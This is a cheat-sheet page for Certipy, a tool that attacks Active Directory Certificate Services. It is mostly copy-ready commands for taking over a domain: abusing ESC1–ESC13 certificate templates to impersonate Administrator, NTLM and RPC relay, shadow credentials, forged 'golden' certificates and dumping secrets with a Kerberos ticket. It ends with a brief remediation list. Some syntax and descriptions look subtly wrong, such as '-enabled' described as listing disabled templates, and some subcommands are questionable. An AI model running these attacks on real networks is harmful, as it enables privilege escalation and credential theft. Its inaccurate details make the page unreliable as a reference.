Salta ai contenuti
1337skills 1337skills - Cheat Sheet

Certipy

Certipy is a powerful Python tool designed for Active Directory Certificate Services (AD CS) enumeration, exploitation, and privilege escalation. It automates the discovery and exploitation of vulnerable certificate configurations, including ESC1-ESC13 vulnerabilities, making it essential for red teamers targeting modern AD environments.

Installation

Sezione intitolata “Installation”

Via pip

Sezione intitolata “Via pip”
pip install certipy-ad

From GitHub (Latest Development Version)

Sezione intitolata “From GitHub (Latest Development Version)”
git clone https://github.com/ly4k/Certipy.git
cd Certipy
pip install -r requirements.txt
python3 -m certipy --help

Verify Installation

Sezione intitolata “Verify Installation”
certipy --version
certipy --help

Quick Start

Sezione intitolata “Quick Start”

Basic Enumeration

Sezione intitolata “Basic Enumeration”
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100

Enumerate and Check for Vulnerabilities

Sezione intitolata “Enumerate and Check for Vulnerabilities”
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -vulnerable

Execute Request for Vulnerable Template

Sezione intitolata “Execute Request for Vulnerable Template”
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 -ca 'CA-NAME' -template vulnerable-template

Authenticate Using Certificate

Sezione intitolata “Authenticate Using Certificate”
certipy auth -pfx cert.pfx -dc-ip 192.168.1.100

Enumeration

Sezione intitolata “Enumeration”

Find Command Basics

Sezione intitolata “Find Command Basics”
# Basic enumeration
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100

# Enumerate all templates (including disabled)
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -enabled

# Show only vulnerable templates
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -vulnerable

# Output as text (human-readable)
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -text

# Output as JSON (programmatic)
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -json

# Output to stdout (for piping)
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -stdout

BloodHound Integration

Sezione intitolata “BloodHound Integration”
# Export for BloodHound (old format)
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -old-bloodhound

# Export for BloodHound (compatible with newer versions)
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -json > output.json

Advanced Enumeration Options

Sezione intitolata “Advanced Enumeration Options”
FlagPurpose
-uUsername (format: user@domain.com)
-pPassword
-dc-ipDomain Controller IP address
-enabledShow enabled templates only
-vulnerableShow vulnerable templates only
-textOutput in text format
-jsonOutput in JSON format
-stdoutOutput to stdout
-old-bloodhoundExport for BloodHound compatibility

Certificate Template Abuse (ESC Vulnerabilities)

Sezione intitolata “Certificate Template Abuse (ESC Vulnerabilities)”

ESC1: Misconfigured Certificate Templates (SAN)

Sezione intitolata “ESC1: Misconfigured Certificate Templates (SAN)”

Vulnerable when: Template allows SAN specification and has an EKU allowing authentication.

# Enumerate for ESC1
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -vulnerable

# Request certificate with arbitrary SAN for Domain Admin
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template vulnerable-template -san Administrator@domain.com

# Extract and use certificate for authentication
certipy auth -pfx Administrator.pfx -dc-ip 192.168.1.100

ESC2: Any Purpose EKU

Sezione intitolata “ESC2: Any Purpose EKU”

Vulnerable when: Certificate template has “Any Purpose” EKU, allowing use for any purpose.

# Enumerate for ESC2
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -vulnerable

# Request certificate
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template any-purpose-template

# Use for NTLM relay or other purposes
certipy auth -pfx cert.pfx -dc-ip 192.168.1.100

ESC3: Enrollment Agent

Sezione intitolata “ESC3: Enrollment Agent”

Vulnerable when: Enrollment agent template exists and can request certificates on behalf of other users.

# Step 1: Request enrollment agent certificate
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template enrollment-agent

# Step 2: Use enrollment agent to request certificate for Domain Admin
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template vulnerable-template -on-behalf-of 'domain\Administrator' \
  -pfx enrollment-agent.pfx

# Step 3: Authenticate as Domain Admin
certipy auth -pfx Administrator.pfx -dc-ip 192.168.1.100

ESC4: Template ACL Abuse

Sezione intitolata “ESC4: Template ACL Abuse”

Vulnerable when: Non-admin users have WRITE or OWNER permissions on certificate templates.

# Enumerate template permissions
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -text | grep -A 20 "Permissions"

# Modify template to enable SAN (if you have write permissions)
certipy template -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -template vulnerable-template -modify -enable-san

# Request certificate with SAN
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template vulnerable-template -san Administrator@domain.com

ESC5: PKI Object ACL Abuse

Sezione intitolata “ESC5: PKI Object ACL Abuse”

Vulnerable when: Non-admin users have control over PKI objects (CA, NTAuthCertificates, etc.).

# Enumerate PKI object permissions
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -text

# Modify PKI objects to add malicious certificate publisher
# (Requires specific permissions)
certipy pki -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -dc 'DC-NAME' -modify

ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2

Sezione intitolata “ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2”

Vulnerable when: EDITF_ATTRIBUTESUBJECTALTNAME2 flag is enabled on the CA, allowing any template to use SAN.

# Enumerate CA flags
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -text | grep -i "EDITF"

# Request any template with arbitrary SAN
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template user -san Administrator@domain.com

# Authenticate as Domain Admin
certipy auth -pfx Administrator.pfx -dc-ip 192.168.1.100

ESC7: CA ACL Abuse

Sezione intitolata “ESC7: CA ACL Abuse”

Vulnerable when: Non-admin users have WRITE or OWNER permissions on the CA object.

# Enumerate CA permissions
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -text | grep -A 10 "CA Permissions"

# Modify CA to enable EDITF_ATTRIBUTESUBJECTALTNAME2
certipy ca -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -modify -enable-editf

# Request certificate with SAN
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template user -san Administrator@domain.com

ESC8: NTLM Relay to HTTP Enrollment

Sezione intitolata “ESC8: NTLM Relay to HTTP Enrollment”

Vulnerable when: HTTP enrollment is enabled without HTTPS requirement.

# Set up NTLM relay to CA web enrollment
# (Requires ntlmrelayx from Impacket)
certipy relay -dc-ip 192.168.1.100 -ca 'CA-SERVER' -template vulnerable-template

# Trigger NTLM authentication (via compromised system or coercion)
# Relayed credentials authenticate to CA web enrollment
# Certificate is requested and enrolled

ESC9 and ESC10: CT_FLAG_NO_SECURITY_EXTENSION

Sezione intitolata “ESC9 and ESC10: CT_FLAG_NO_SECURITY_EXTENSION”

Vulnerable when: Certificate templates lack security extension, allowing NTLM relay without token binding.

# Enumerate for ESC9/ESC10
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -vulnerable

# NTLM relay attack targeting the template
# (Requires coercion or compromised account)
certipy relay -dc-ip 192.168.1.100 -ca 'CA-SERVER' \
  -template vulnerable-template

ESC11: RPC Relay

Sezione intitolata “ESC11: RPC Relay”

Vulnerable when: RPC authentication is relayed to AD CS without protection.

# Set up RPC relay (advanced technique)
# Requires interception and relay of RPC traffic to CA
# Typically combined with coercion techniques

certipy relay -rpc -dc-ip 192.168.1.100 -ca 'CA-SERVER'
Sezione intitolata “ESC13: OID Group Link Abuse”

Vulnerable when: OID group links allow elevation of privilege through certificate issuance.

# Enumerate OID links
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -text | grep -i "OID"

# Request certificate leveraging vulnerable OID link
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template vulnerable-template

Certificate Authentication

Sezione intitolata “Certificate Authentication”

PKINIT Authentication (Kerberos)

Sezione intitolata “PKINIT Authentication (Kerberos)”
# Direct PKINIT authentication
certipy auth -pfx Administrator.pfx -dc-ip 192.168.1.100

# Request TGT using certificate
certipy auth -pfx cert.pfx -dc-ip 192.168.1.100 -kerberos

# Output TGT to file
certipy auth -pfx cert.pfx -dc-ip 192.168.1.100 -out tgt.ccache

Schannel Authentication (LDAPS)

Sezione intitolata “Schannel Authentication (LDAPS)”
# Authenticate via LDAPS
certipy auth -pfx cert.pfx -dc-ip 192.168.1.100 -ldap-shell

# Interactive LDAP shell for further enumeration
certipy auth -pfx cert.pfx -dc-ip 192.168.1.100 -ldap-shell -verbose

Pass-the-Certificate

Sezione intitolata “Pass-the-Certificate”
# Export TGT for later use
certipy auth -pfx Administrator.pfx -dc-ip 192.168.1.100 \
  -out ticket.ccache

# Use TGT for authentication
export KRB5CCNAME=ticket.ccache
secretsdump.py -k -no-pass domain.com/Administrator@DC-NAME

Certificate Requests

Sezione intitolata “Certificate Requests”

Basic Certificate Request

Sezione intitolata “Basic Certificate Request”
# Request certificate from specific template
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template User

# Specify alternate output name
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template User -out mycert

Request with Subject Alternative Name (SAN)

Sezione intitolata “Request with Subject Alternative Name (SAN)”
# Request with arbitrary SAN
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template vulnerable-template \
  -san Administrator@domain.com

# Multiple SANs
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template vulnerable-template \
  -san 'Administrator@domain.com' -san 'user2@domain.com'

Request On Behalf Of Another User (ESC3)

Sezione intitolata “Request On Behalf Of Another User (ESC3)”
# Requires enrollment agent certificate
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template vulnerable-template \
  -on-behalf-of 'domain\Administrator' \
  -pfx enrollment-agent.pfx

Specify Certificate Output Format

Sezione intitolata “Specify Certificate Output Format”
# PFX format (default)
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template User -out cert.pfx

# PEM format
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template User -out cert.pem

Shadow Credentials

Sezione intitolata “Shadow Credentials”

Add Shadow Credentials (Persistence)

Sezione intitolata “Add Shadow Credentials (Persistence)”
# Add msDS-KeyCredentialLink attribute
certipy shadow -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -account Administrator -action add

# Returns KeyCredential data for later authentication

List Shadow Credentials

Sezione intitolata “List Shadow Credentials”
# List all shadow credentials on an account
certipy shadow -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -account Administrator -action list

Remove Shadow Credentials

Sezione intitolata “Remove Shadow Credentials”
# Remove shadow credentials from account
certipy shadow -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -account Administrator -action remove

Auto Shadow Credentials

Sezione intitolata “Auto Shadow Credentials”
# Automatically add, generate cert, and create TGT
certipy shadow -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -account Administrator -action auto

Get Shadow Credentials Info

Sezione intitolata “Get Shadow Credentials Info”
# Display shadow credentials information
certipy shadow -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -account Administrator -action info

Account Persistence

Sezione intitolata “Account Persistence”

Golden Certificates

Sezione intitolata “Golden Certificates”
# Extract CA private key (requires SYSTEM on CA server)
certipy ca -pfx ca-cert.pfx -export

# Create certificate for arbitrary user
certipy forge -ca-pfx ca-cert.pfx -upn Administrator@domain.com \
  -out golden-cert.pfx

# Authenticate with golden certificate
certipy auth -pfx golden-cert.pfx -dc-ip 192.168.1.100

DPERSIST Techniques

Sezione intitolata “DPERSIST Techniques”
# Create persistent certificate for Domain Persistence
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template User

# Store certificate securely for later use
# Use certipy auth to authenticate after domain compromise recovery

Relay Attacks

Sezione intitolata “Relay Attacks”

NTLM Relay to AD CS Web Enrollment

Sezione intitolata “NTLM Relay to AD CS Web Enrollment”
# Start relay listener on HTTP enrollment endpoint
certipy relay -dc-ip 192.168.1.100 -ca 'CA-SERVER' \
  -template vulnerable-template

# Trigger NTLM authentication from target (via coercion or compromise)
# Relay will automatically request certificate

# Use resulting certificate
certipy auth -pfx Administrator.pfx -dc-ip 192.168.1.100

RPC Relay to AD CS

Sezione intitolata “RPC Relay to AD CS”
# Advanced RPC-based relay attack
certipy relay -rpc -dc-ip 192.168.1.100 -ca 'CA-SERVER'

Output Formats

Sezione intitolata “Output Formats”

Text Output

Sezione intitolata “Text Output”
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -text > findings.txt

JSON Output

Sezione intitolata “JSON Output”
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -json > findings.json

BloodHound Integration

Sezione intitolata “BloodHound Integration”
# Export for BloodHound (compatible with CE and Enterprise)
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -json > bh-data.json

# Import in BloodHound: Raw queries → Import → select file

Stdout (for Piping)

Sezione intitolata “Stdout (for Piping)”
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -stdout | jq '.'

Troubleshooting

Sezione intitolata “Troubleshooting”
IssueSolution
Authentication failedVerify credentials and DC IP; ensure user has domain access
CA not foundCheck CA name with -text output; use exact case-sensitive name
Certificate enrollment deniedVerify template permissions; check NTAUTHORITYCERTIFICATES
PKINIT not workingEnsure PKINIT is enabled on domain; check certificate EKU
No vulnerable templates foundESC vulnerabilities may not exist; enumerate all templates first
Connection timeoutVerify DC IP is reachable; check firewall rules for LDAP/DC access

Best Practices

Sezione intitolata “Best Practices”
  • Always enumerate first: Run certipy find before attempting any exploitation
  • Document findings: Export results as JSON for analysis and reporting
  • Test in lab first: Validate techniques in isolated test environment before production
  • Check template permissions: ESC4 vulnerabilities often require understanding ACLs
  • Disable vulnerable templates: Remediate ESC vulnerabilities by disabling templates or removing EKUs
  • Monitor CA activity: Check CA logs for suspicious certificate requests
  • Use strong credentials: Ensure accounts used for testing have appropriate permissions
  • Clean up certificates: Remove test certificates and shadow credentials after testing
  • Follow least privilege: Request only necessary templates; avoid unnecessary SAN values
  • Track certificate lifecycle: Monitor issuance, usage, and revocation of test certificates
Sezione intitolata “Related Tools”
ToolPurpose
CertifyC# alternative for AD CS enumeration (Windows environments)
ForgeCertForge certificates without CA private key (older technique)
PKINITtoolsPKINIT-based attack tools for Kerberos exploitation
RubeusKerberos interaction tool; pairs with certificate-based attacks
ntlmrelayxImpacket tool for NTLM relay attacks (pairs with Certipy relay)
BloodHoundNetwork analysis; visualize certificate attack paths
ADCSPwnOlder tool for AD CS exploitation (use Certipy instead)